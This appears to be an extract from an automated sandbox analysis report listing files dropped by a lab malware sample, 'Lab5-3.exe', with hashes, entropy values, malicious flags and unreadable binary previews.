                                                                                                          Preview:".......d.*9|f.;.._....1.n..q...l...(Co.>.r....UaQ.....Rq..@*.=.5.`....R;wz..9{ ..[8.o.E....(..!....y...M |.D..b.0...Zg...\.M?...IM..._.J..d....M$e!.....f0iU..q+...RV}.o..U.....=.1....=.?.l..........v.oj.]c`.I...k......X..E/.....N....]..'.....~....q8+..1../#.5>..t..|..5..|..nF2F..`|.@.C4.%|D...[.y...#..#l.h(...tO...@.O.r...Xp...9.......M*+.n.|Y...k(......W.x.}..9.V.:..'I.W..%.YC....!....Z?.....'h..w.qqQ.....B9....).X.<TWq.... ..!E.Pe .2...X^1.....}=^u..%/....e..*$0...g+}W.T/}....i.......H.....hT....6AS....'.9..5......r..>.'....;j...rCp.$.r...`.J/@...t.m...c..Hj...z.Z..vB...+...MwM...#...Y..\..^...>PS......|.......H.. ..u.^&.%....2......}:.J.C..5h..]e.._.F0...oL..<...[m....=.Lr.{@..'.p.u.d..p......}qv.c..xZ.... Z.4j..?UP..4.J....o4B........8+......|...(.{...U.x...A.._6...C...c... ....\*...?..4.y.|K....*.8....D.5c..7.;B......;i..S..`.m...xn....^...0KW...V.!j9.x.>..i,,.+.R. .g.}...mTz..#.SQD..@g.L.rE.b....(7.R/`5..]....(P..7l\.#QZ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5808
                                                                                                          Entropy (8bit):7.966893527748801
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:1X4bec7J1PBrYYUFIH7lQ9KYRXp5XhQeY+BaX69QCzLirVhdGx0uKeY2ElUJ:p4bD3uFFA7lITz3VuKQCzMm0Cb
                                                                                                          MD5:82E67F257043068FB47EECA735DA731D
                                                                                                          SHA1:478A41A9F9EF123D3B669204424266C34795655E
                                                                                                          SHA-256:858566BDDFFC39517FB4F845F52A7E877759E37AECAA29949F88049470E09AA7
                                                                                                          SHA-512:631F3680FB8943BD7506354F6512AC8D03DA4743FC852E06715871C43604976B3F9A5FF19D2E6FECB6494111CF9A2F06E55CBDCC01BCDDED1A086671158B6FA4
                                                                                                          Malicious:false
                                                                                                          Preview:..gL.T..HuD.m.....D.j.dVA.s...LX*.WS.e..zVc..l.y....i...o^.. ...H)@.I.k^......R.d3E.c!.(..FJ..~d...N$..aN.N.....1......f.m.P?....[AUC.#:,.y.....^..;i.=('w.v92.(.9Tp..Tf.Oj...O.u5..x..z.?..#.....K..u.HXy.u...].6M.&.."@....C>.K....G.!*..$.% .X..z../8X........Y.O3.S.<.HI....^...q......<.......K....a.. 6.g..B....|....e.b7<mD._..9.(.X.dc.W.m........%.dL...v.an.V....E...v9<M...U......`.T..|.8...W<..G0......i...J.[.R..o<^h... K.....:.*..E.B.t.U.....L..O..`..Z..`F... ...gSR.z..emF.).c.wC.p.K..$EKT.=!..R<.C.......-?...(....}..Z.Q.Wq....r..|.....}......'..Up...e.D.gH3..\..5P.....u...E.9.j......qH.l34.Ara.`w.u(._<"-.......!T.4~-~...RA~.j.1.....!+.Vp(o.P..uC.err.......`_....".Q..m...V;..$.c#y0>....^...H..Y.R^&... .v.Cs....J.l....&...>_...=..4......3O'..l.........F.....J.K...!...z+.g.#..CP..%........*.m3...p..@.o..PI.q~......r4.q....Io....q[.$...X?y...U.......-.gQA.,'z.-em....g[...........^..y.,b.k.$p..S...HG..%b...n3A(.yd...~.a]....h...>)C.(.>g....+WW.G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19280
                                                                                                          Entropy (8bit):7.990566830786108
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:EFZPDINXeu8CqGyiRDss9ggj3Qnl0SVlLvcp1uP1ivt4o9xyO/G5y5ytb:EFNIsubqfit7eoQnFLv4m1ivt4oLMygZ
                                                                                                          MD5:C89957F39069DADF9729877E441E5561
                                                                                                          SHA1:94683D6236E0D4FDB590DF82A1035DC20DE39B1A
                                                                                                          SHA-256:D241D20DE0BA2D9C194A0CC35F80131C58436E3B7AE3D45A844C00147B6D0BFC
                                                                                                          SHA-512:3631117DD3A519CAA9794A844FF28D2516C160FB0AB7F5B5A00EDD0A6F2A9FAE57084F15814573741719F2582A2EF6DF60254AD4940D01E100367D71D0CB6AB4
                                                                                                          Malicious:true
                                                                                                          Preview:LU..<.....(.....j.c............~.bY...h.g.R....k.Ub....q.a.)..V.&WI......@...9...x..Q.>C.y.....G.]sesOi[.E.?k...+..,.F.h.(......k=..H..D..*..-3.....<..Z:......D..[...."..3'..Z/....BN..%Vg........p.e.5.t.D.r.......?./...P.s}Y.g.#.....@.....9D..0.....i...r>....Wr.A.......t.[T.j6....Q..{..W.....4F&....Bk.........7..........x"(..Po.&!..{..P...m....~..........90.........P...U{; ...Z..._w6..s.l2..x..6.jbX%..i?.K........I_;_q.]......Ta..t..*....BR-..7.......@A.:.;62.%=,......J:.y.s'.aN..`q.....i..8\8,$.....e.A.g.?......!t..E8.0..Ay.t...}&......-[.B.Ez..?..H.....T...Q/.......{VC.H].......$_Xy*......s..&.R......h..< ..pp.Z.`.t..k...E...sM.....P.o5x.x\C..o..el*k........w.7../.......J(..w....L..$`.ot)A...Dr@*..RK^.P..{..Ia.....yL..|....u..s.u^.Av.E.T!....`...=...](.Q..OL|...r.Q+...g.c+...vaC.7..,..z...}^>..J0!..j.}7.....FA...XS&..p.......Z...l..yN..0...Q2.....-...]l.4..[..9.E.....d/..x.29..].km()S_.p.....PF.d8m.)pBh..69..g...H.%..~6Pk<.N(.X.?...:[}m..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7504
                                                                                                          Entropy (8bit):7.976953673038739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:XtqvZRJecc0i8+ayXGGQP0sMKbgL3pwPU1OvkwAWVc+hwtZSGuY0ls6rGx0uKeYO:EXcnDsPuGOwc1xpmcVsGuY0ls90Cb
                                                                                                          MD5:E00935C88C005D747538B27BB5ECD873
                                                                                                          SHA1:8B0AC362E678090EC38CD0D6E0158C27201D6CC7
                                                                                                          SHA-256:5031C2FC1F086506EF24040ECC18E8DC8B449C90C17F477D79857ED4C6221BF7
                                                                                                          SHA-512:BE07F790E928D43565B07E40E0BAB60EA47D435977D92B20F75213C4F40607057C3BCAC6FB3D2E1AFACD46CF6FD2833650566CFA3FD75ADD0CCD8F82A2E04D04
                                                                                                          Malicious:false
                                                                                                          Preview:a...N....|.....F^...N...h..i.....P.......O.kh.^..H..Cxh.P:......q...xY.o.Q.*j..8...B.4...z.J...R..>.....\ ..e]Hz...V...m..~.0....e..6.4.w...k...|.P9.........(;7.0-a ..]Ft...9.!...Z}.....V.K.\..PtY.t.&..W...{.....".b.u..;y...IM.b$@!.^..x.P.t.az...R.w>..:...P?..:HKvA.F.n|.S..6.....y.I].._.P...qf.."F.ZJ.7I.....b..S..^...pf.yw...Oi......7.$..1.+.<?K$...<.e.h....;.y....xwO.P=eV..I+G...I.bCQ&......Mv.....qH.J....v.^..V...L.WS..;M!..E.y#Ge..tV...b..x.1..$.x..+.K..`......}.mQ..E|.*{}m........(6`./^.^.?...y..u...E.71.]./....8...>D&......;N..9..Oo........9......fn...T..e.[..Oi..\g..-.f.T)...R.G.d..:~/.?.....#aec....'5.{.z.".[j.C...#,.|=....n...r.........m....~YX.......A..E.?Vq.&.y.......2.S..`..=2........m..uw...Y...k......]..........RyX.F.*...:7..7..PA.<.q...b>yr..I ......=..n./......04.f.....{M.l...E..p.+..c].kj.b-.q..p...-...K..L.}qO........!...~.`.;..,]jK..v....g.....s8c<..N...|..%I.|6....;fhl..i..W7.W..k...P....RZG...g2D.=...%=...&....^]4l
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.93111150724726
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tzno5x6FnlNBERys8BrYiHfUTid3hBaUoSGFcmeykEdEElU92i:Rno5WnFERyBBsdGx0uKeY2ElUJ
                                                                                                          MD5:373F423D207979C650BBEDDFEB03F76F
                                                                                                          SHA1:24D48F8BD6495EEEB7C2042B12EFF3100C835BBF
                                                                                                          SHA-256:F7C2FE3DF17EC56AA07193F606A72B9F046D9103DC4D7AD5B652F4E53EA280CE
                                                                                                          SHA-512:5C00DDAA846101DF18AAECC843232A09A77610A751CA2007179EC9C47857EBCCA80F7F9342D82E1E4EC070C10BD52CB7C0201176D9976BB6E012126FA1382F9C
                                                                                                          Malicious:false
                                                                                                          Preview:.,.Bj.n...&...........l.+.......D..P..5J0...o.t.O...o..;....q...[..:..@............wet.0..+...1.D.B..-.G.L.Dx..1.&.Ug...!3].xi...........,.4u-.}JkVj0.z.........m...O..'...v.....zH...D.1..h..a......nJ.^}a...c.+....~. ..%...]...W1.1........u.....Xcg.J....s.......JjR$..+hY......[.w*...~.#z...w........./...skGO.....R....P.2...7.R..C....M..."b........6...m\).+..$.g|*:.o..._.~..z{.J.Q.9.."w_....P...RE1..R..sg.P....%.....r.&._..?...Drv3.......x'..h.>.t...s...o....u...q..?...x*.........K....b*1....Z..a......&.7)...~`...r.&T...m.g.1......xhr.....~.....O.1......w.I..8B)<...f.i....N.GG...-.......e....:.o.]...X."..:.A..#iZ:YG....BS..q..ZjF..S^2A!K@."....r...&...G..:..U....4.p.p.}.>..I.K.,.a4..bZ..I..52...w).......8JOkl..T..iJl.x....^...ByB5...-..[..4...(.....o.%.}1`".:H.....+92.Cc..Z.Rj<...dd..&._... .*...#..j........;6..P..IrL...W..O!.$.CT@V...r.N'...].)_.).!s;...W/..A?.z1f...R..e....;jg.....M ..E..qb_.v....)2.G...d.{.....+<.d4.D.d....`[0...>.-w.x.c
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.92397135337357
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MOKylk0TTL8FLsRCkmw+zHfUTid3hBaUoSGFcmeykEdEElU92i:MOKCk0j8FZHWGx0uKeY2ElUJ
                                                                                                          MD5:A0BA929075D3C00E6270162826FE1986
                                                                                                          SHA1:545448692416AE8726D828DC4823CE0C7C8BDA66
                                                                                                          SHA-256:B9BDF66D91A2FD3CD8FB0E6744E7DDB235BAF7D4FD2B815E7D2C3F95CA59AC98
                                                                                                          SHA-512:7308705121AC18574B17A593B79235DBDA6D4DCDB9B094F9BCD650A6AC516D7A134CBBEDD658C0F82A56688F98E995A8B7273F14F9C483CF1634B83D246B130D
                                                                                                          Malicious:false
                                                                                                          Preview:.h..$.....y.......,WQ...B..Ol.F..PX.0W\..K....h..^.K.a.G..5.....n.g.CH.p......k....Y.!t.<b...k....7..k...I.`.ZB.g..).w.....$..X'..gR.{...rks.n..8..V..8...c.}..FS.(....1w.(R/..>...Jul.y..tX..5`.pG.%......o..n.x.w.@an0.T.1...L.>........<....P.]..[.._...q.(........9o..62...x...Q.9...>&..}.Z,...U!..K.....@..<..~[j~.....Q..%.n.2@.`(.+n.+.[..18C...xw.-+&..3sc.a#.4.B..?...hb.7...............R.E./e&$...z..e.e:...f....W...XC..-$...[.....}L..R..].o..S..I;..Ti.H...>l.....x6.0Nc.n.8._.....j..{h.3.p.J....7.xO-S+...Rc......>.w....-.bA......vrK{..U.....S..E.uQ/.......T.IBSD.K..[>:`&...M....2..p.w......~N.hPNNJ.........t....as..A....=..%.<....0(._.3.;.GtHj...6I...."..Jb.....A3.v.Oz..3...T..O.3...h..hD.\kO...g..c3f.{.$Ka.:H..u.....z...o.92.Vd...5aK.k$!.E.q..}"......!.%.Du.[..9t..<Q...u..&q..t..$~0.+/|7.8yO8k..;....fU.h..:...D...*....]."..l...j2<>.8...r.r.......:Km....9v..J....afe.y...G.R.%...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.942217628522843
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XVFkfSKLxSCCtuHaEhh0XJ46tASHfUTid3hBaUoSGFcmeykEdEElU92i:X3taCtFyhCGNGx0uKeY2ElUJ
                                                                                                          MD5:29D686AFA753983017F64E1A938AE76F
                                                                                                          SHA1:56716D4B7A061638CC219DFC07D1947C9A7EBD0C
                                                                                                          SHA-256:DF12C657606E2F27EADEC69D9BE9C1FBA9FFDCACBAC2FDAA89A9F544D0130B5A
                                                                                                          SHA-512:F5D361D47BC72E539312DBF1E0B95C5D6F66F65BAA501760EFB74B79B8492374436426D4756D048C471F698BA54A1B1909549D900961FC2BFFA710DCFA4A0EC2
                                                                                                          Malicious:false
                                                                                                          Preview:..q...........M...d|...*..3...o>+.. ....S0V......W>..`.]F...;.o..E2#C.W...%..K.c.^...7:Y/P.@..DV.....V...G...m.r.%..WHq].<.}.......Q.V......2.A..#.5.PP..\P)h.4..Y...*`Sq... .......t.!.R..^.u.......H[.....!8..Lt...4...vx.7..4... .2.MZ...D.>OI.n.(.B!.S..r8..n.5.......U.L.a.....hGzL.(.^.]..SF.K.. .W.....p-.%$K....).EF.+n....ceDb..Q2.]...i.R.t..N..w._...9..<2J....$ .A.._@%......Ql.F....t...sk+........>.".....s.JHp.....7.r..Pe..}K.....]p&{..;....I_....ol;&..o..}....ThF.L..VOC.....m4+...wh...z].....;.p.W.t......2......gcm.W..\G..n.O.4....)..gwU...}...R.[....)..:.?#.:l>.-.(.-._A.Y.).q..M...e...[C.b...'`.v;h.=X.....#@.P^....d....t.`..h...'.X!..J...z.....w>2#.b...pZ..v4.j*...G+ai.U....!B..(.I.~.e...[F...$..).w.3...F.F.mb..WX.b...j.......<.|.9....9t..sTV..A.]v..q...F....2......y..1L....d..|.<...6...~T...,.j]..S...Ps.E...~.T....yD.Z..s*CKN...Nv...u&.jZ@.|../>&k.&.s2...:..x.W}7Ec..XB...K..`1..{]....u=tA.X....f._..U&).......7."......$....%.M`&2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.91569475867391
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xgHLRNBwL07vf+sLo2VFHfUTid3hBaUoSGFcmeykEdEElU92i:yHLrBb+cgGx0uKeY2ElUJ
                                                                                                          MD5:7AD33548419C222EF4D313483EE33E3A
                                                                                                          SHA1:EEE7EF675FB9F4088DC98F4B280A806530D1F46E
                                                                                                          SHA-256:62D2448A6B56950293DEB4EEC3EB8522E6BDABDB683ABDB1DAA0B2967B523B18
                                                                                                          SHA-512:04615B4A80534F4CAB0AEF442A347B58437EC6DF5697E09217CAAC74459B0E76C5C73261D19BC19656F883B47E5F15E41A83579FE5DE2E62652C0A9E92EE172E
                                                                                                          Malicious:false
                                                                                                          Preview:..(.r0..M.|k.......l^....+Lv.......4.*....F7.rK.5f..9s...._\b.H.eZ...=/...)\Mc<n...g,.-&_A..1.]....?.).T....V.3..vk.JJ3k."...8.......1.....=.<4k..6..=3t.......Bp..........m~..O/&..n..T...`..;.u.~9..v.......<.........Y..".}..Dt....>,.C2........`1...?a..Sy..[...>K.;..+{1.w)6...N.sS...d..d....d~...2.\..;...".=.3.....q....C....M.'7)..(.iy..W`j.!.2*T.......o..N.-8...I.....7.m]..o.e....;..T>..Q...U.i..6..c.l!.\.Y.....r.).GwF.\?....$.&..1....Y.......CAU...P......T...A......X.. ...S.a2..R$.U...xNI...!...sn{.u.d.#.:.s.[.X.~..u>V"....k.....@.K......p........;.5....).xK.[...?.JRCsQoW,&..gs.5..Q.....D.~D,.!(7k..D..*.f. ......vQ....RYQ4..].._U4>.x...J..H..r!....j.~..s&.l.h..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.917631604191463
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EB9g5q4yD5Dcc1wIYVSGDimGlO8HfUTid3hBaUoSGFcmeykEdEElU92i:IF4yDh1wIarD/7Gx0uKeY2ElUJ
                                                                                                          MD5:B0BEA9E5625759E170EAF286E0F013D1
                                                                                                          SHA1:C285C8743AE0A4ADACABF296DCF2281BD2AC5A3E
                                                                                                          SHA-256:8A94BB0162951953057DDE9A7C50AF976311713FEF4B6FF97A317E286CEF2468
                                                                                                          SHA-512:57A78E1FD2EA1037266B246F9671D22F5D9F35B55A7ADC4FFA9DF6A7C353E9C1FDA38E01C09E2E2A0D4F524A603C4447F2D4D616010663E76F55E3B35A9B6794
                                                                                                          Malicious:false
                                                                                                          Preview:!:...^JN+.th.5......>C...........}.....J.o.b....).f.P...v.q..Z....%.`.}....jAH.....);G.. ./K.)A.$lE.k.....#..0ml.\.W1M..B.j+...cFix....wE.J._.Q..z)*cz1...^.......0E#..PCob.A......C..m.....{@..Y..........thT........O.r]d..2r.*..../D.Y..r]..]..\t...E.,.|MJ.Nd2..'...`D..9u..8...{XVt'.0..*.l.....7..}K.#...t." wLS..x...d..WD..8v..A.0..Sj.......7K.'......',E4.....^.S.S.(B............EC.<......Sq+....#U...r..Up.3.F.<.fj.4P&.E}.@.'.-...jw.r. &.334.J.....N}."@c9..@.....v..y.)z.s..g.....x..1?....t. SW.8.1....m...ML.N.,I..S..).....D...C.....:.....lC.V..<.a.......Sbl.ge9....;..c..H..(M..e@.......I...6....H....;[...^....+....Z.7..wc`sU...`...l...22..Mn...........q.To.H.C$+...YzHPKz..4...b9ERq..-W.&..t,..{.....@..%./.....s..4.;@....:.U...\.;.........O.v..6...w.!4j...7a.b...K...P.ceHMq7.B....lF.......6.....m..@../._..A.D..a\a..aW0.../.|y...w...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.896299904662043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:a6k68nFjDmva0b7HfUTid3hBaUoSGFcmeykEdEElU92i:5xcgaYIGx0uKeY2ElUJ
                                                                                                          MD5:B5692755BD2486F6CAA416BA916AA1A2
                                                                                                          SHA1:F4EAC82E908966A96E875EF4C511D90BBDD8F90E
                                                                                                          SHA-256:1CA1C46C45895B954A5306F39D15C0F51A1F7AC4BEA2314C50E8B08804871D64
                                                                                                          SHA-512:026108BAB9C72F2B993ADD8EB6E035AE045F32A6AB7F4992E75E757E5998CF4AD51C5F09466F6463BD01CB0A29B67C33E1BE2511FC48B65EBCA693CA9DA4D504
                                                                                                          Malicious:false
                                                                                                          Preview:...c./..2.e.......*Z.R&.........U.d..r.J..}6bG.....T...`.M.?..B..N.MZ....;....cc.&$..~.n.)J.$\?:......#.....R..$.Z'.0&..:Amo..SG#.q*..f.6.eRgg..)..*......&Q.............'.Z.U/.-...dN.:..M......3..#...k.....#.Dm|_..V.u(.5~U..M.7.+...LQ.#....|..n...T.N.K.+...J.CS!..g.e.4b.V....b.X....LWi\k\g..%....!........1H1L|#E......U..}..'..i...1......[.._..j..8_....iW.9S....{..2....$nJw._.h..0..K..%...J.V.`]L\...R*Y,.=.q/..zO...Qv(...'......}Y....6...N4...G().Q....^.........HEjk:...l.:bW5S..J.M...9..T-..c....{.#Z........a.8%.c.~.. ..1..4zB..y..E9y..b-.'w...4kM.-..^.;...?...Y..<.X...m......uR.<M.-.._.X..|..h.uy...a...S....:!..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.901352703683521
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IMU0nerC0hHfUTid3hBaUoSGFcmeykEdEElU92i:IL0nerEGx0uKeY2ElUJ
                                                                                                          MD5:038BDE504763A1AA1FCE23E90BDF50BC
                                                                                                          SHA1:F39CB1DDDD962DD074AA8E2503B50D58563BC7C8
                                                                                                          SHA-256:59B8E90A84DDCF04E4106583C5302D6C24728272167AF97A91F4B0AEEB00D5E8
                                                                                                          SHA-512:7C629D67E3C0591FC357CB2FD5AF6DB830F55BFB363A93FFF5BB5033AD03EA08C18EEA7AC7323214936078821D353CB072E34FF92E7A4E4644D6BD5AFB9F91EF
                                                                                                          Malicious:false
                                                                                                          Preview:0..}....&.@.....%.Wn+.M.j.o..........1...z.}Y...T.1..g.q.!..W.6.[......}..@.g.@...EC.u.z._.4.[q..kX<....1.L..`....L..^...=..:k#P^bFn....!....(.Z....Q...!..).h...;Q....b.^x.....7*.O?.Ng....-........i.A+...;87.c......?.,.....'*xP...N...B..k..7..j..s2z.\.`.9..q.Q.cBr(....UgCg]..X........y$...>...SD1Q7..\..8M(..&....~O...\..=.....}%....g..X..%@?_..c..e.`......v:9.Z.+A.X.+.h"=.U.._h...P.{.Q'B..L....;..{.8.2.f{w........J@cQ.....$.._.vm5.p=..Q..5...L..+4Q.....W..y.?.V..C.5J..l.W...:*..M.QJj...].t.NA......t.;.a).C.S.....|.?;s.x.u.e._fZ\*Q.T...c....1tMz.V...2. D...t..~N..l`...I<W`]..H......."g....f.3}...S.hgX^o..=._..MXKL|&.e....F...?....Y...-...~3.!.D.=-.y.%..R..'....NC..X[.J.g..T.. .5R)..Vy.........?.....\x......Khfx....Q.ep....fEn..}.....d.4...Z....J[~a..4.....u...3`...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.915976310755389
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:05r2Pt+LvOAzI1DnNHfUTid3hBaUoSGFcmeykEdEElU92i:mr2Pt+LGmI5mGx0uKeY2ElUJ
                                                                                                          MD5:1E8BC9C637F87E8231C7F7867D4F1458
                                                                                                          SHA1:8227A7F8F815D718A68B982B1F9383CA2087B92C
                                                                                                          SHA-256:B0E780B20CCE2CDDA6E2AC0832FCDEAE7E091E2796D59B40C22C740A038FBF34
                                                                                                          SHA-512:2E33CF95877E0C83DDCD069C8D37ED0D112E33C58B386D2551D47423C79F629548B13307D482842F1778BD6DCD083C431ADA505E8775F9F2E300CC48C20F5584
                                                                                                          Malicious:false
                                                                                                          Preview:p4T{\b....q;,f3_..%.....D..E.^9.u .Y.w:...6.....U...n|;.h..gG9|`.............s.i.....m>....y.T....-|6.A..r.:G..ZH...^.p..=.9...f.S.O.-.@.l.D..)......F.....0...Q(._..(..h..:^..90.x#.%..^.....K:.f....5.4......'..wB.4.H.\..uVN'T..;.....7pq.J..9..NB...}z.N.D.].Us..1.'L.........f>...un......fjPLe7.{.}.QX...............=M.....Ba.........;.a.].eQ@./.Y..u.P...O..`..F.j...p.3Z....].$O@.THx.-.;...i....^.........6e.....o....dR....i.......{m.K.aj.n.....a.:....o...x.....P9.?V...`N./p$..,(G.(1\`-k....U$.......F.6....l....Q..F.....D.LaI.(u.....#......... ]......&.2.o...dm...j.."..44o"1j....v.;../....../.k.`......Dp..u...Ds.0...v...n.......+gY+.... 1.7Hm.S.<QZ.E.)I..`x......s.C.?...Q........6..WAhH.Vn.'."..M.h.R9.AFu."@:.....H..</C.........|.;I..\...5....v.J..>.1.u..[-J.h.w.h.qCMW.'IAk5...fv...':?o......0....{6..I.C..{.b....?.....t.U@.w.....}.z}.....|....z.?..+4..b..".!J......zW..`.S.......f...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.9353475248458825
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:V3lP8owbp6jsXhBRYytcy6H2l3ik8K97NHfUTid3hBaUoSGFcmeykEdEElU92i:V10z3zyytcy6Ha3ik3qGx0uKeY2ElUJ
                                                                                                          MD5:D0E9AD4AE44B61F46601BD706621377B
                                                                                                          SHA1:CDEE48CF8181F0FF67D35E134A999FB8CE2013B6
                                                                                                          SHA-256:1C0F5BE8F590390F5F0324EF16B40BFE00550609C1AC3B4D2C64AF1E44498E6B
                                                                                                          SHA-512:D68AE94FEA650A30E34C82AD2D184CE8792C3BD46BEE1A0E797820B2BC0B269A9142F26AD5BA79DFCCAD0223EEE88D77D263C127B7312075E743AC49F32674F6
                                                                                                          Malicious:false
                                                                                                          Preview:.?.[..m...T...d6.V..1.7:...%a...(..st...$......$5N..dg.J..+Z%...}P.x....<).Z..<...1..c.._2........7.N../.f.y...6..H..#X...5..}$1..../..}<.^...R.../U...I...0S...........:./.|..."..K.Bc}...._2.:....|0......@<.)}.....".r.~..A..K....!..*..J...5J ...L0>.z......K.s..K.lQ.#.....&..rB...X.....6Q...=h.@.4.f....V..n2...M.%nLz6......nR.P.o.!..1....3.._P.0o..|,...v...<]tC}...Q..LZ....W.po.q-..2...k..&P.t..k..H.!....}.....g....B..7.t...B.0.#=....HlP..."U1V..=..C^.\sN........H.N*E.H......`..A...9.... .4..=cxQ..E....]`....a.cG..T...X...AZE#%...sBD#...D-.6.U^....I."....a.y..M...A...f.......[/M.IT.#.S.......V).oi..).P..a...g..$z08..9ir...y..}..e....+&6E..s[.+.7ag,...).......H..Q$....mU=+.$.[.c.q.C.x)...r...5.....,.sW...^...#..............._.W.3 S......{...;f..0..L...j......4...g3..P..FD..#5.....A.y4b.A...2>...i/u.gR.%*.\.:a....O.......+%..l...*.2..5...+RU.....q...1e. .B.H.9u..!......HZ..k2O5.H..... wIJH}.#....8.!.D..mk.<t....../..o7..<]JL).i..@\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.90729344211558
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bDbIroJ8qtEw1KRTXgZHfUTid3hBaUoSGFcmeykEdEElU92i:bDsr+8k01HGx0uKeY2ElUJ
                                                                                                          MD5:15171F7177711B754A04245B26730A20
                                                                                                          SHA1:A120432C9A4737D68461A03AFFE367C4A70EE88F
                                                                                                          SHA-256:9998D17100D769DE951FE5AE42481A147ED07B39211C6AC0AA2C94209A3CA92D
                                                                                                          SHA-512:90713A06AB0BA3CBDD456198A9694B230FC4377C66EE758AE912A39639A2EC791BCCE3C55BCDCF2E14D0760F17898F99FD1E2AF6929CC11A0BBA402D4D9E5C1E
                                                                                                          Malicious:false
                                                                                                          Preview:3z.U..YS;.L.D.sg~.o.3.u.%.I.?......Cv..X1..C..K[Y:l.|...)y'G..Q.8g..`..).4.Nf........#._A..|.a.....;O....<..Bx,^..K..?.kJGT`.d...Yu.'u..3.}.4....H..^.].8W.[.vO.,..".B"u.d.;.......g...d..">..2........8v!.$,..)`.5..'.]J..a&..+.4..3vx........G(r......D;9.....'vh......../u...}h..%.8.4.Y..V...".....2.9..n.bE..`+&...)......"..U...Z=j.H...k..u.%....i.X.q..9..&c..+.lf.@...n.g..Y-k...;.....Z...h.........w8...rGX.}0....1.`m'.q*.9&IUf..&....w.;.....p4..8n.ieJ=..8...m.$q. .l./.....v.Ua.b.. ..'.N..B.3..4......^........)h...?..X..A..Q...H>.K7.%.iI.^..YR.X........ m.$.s=8}d.........]c..L.+M.d......|(.. ._....WJn.!^t.I._.P]..aO4.s...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.910774427998061
                                                                                                          Encrypted:false
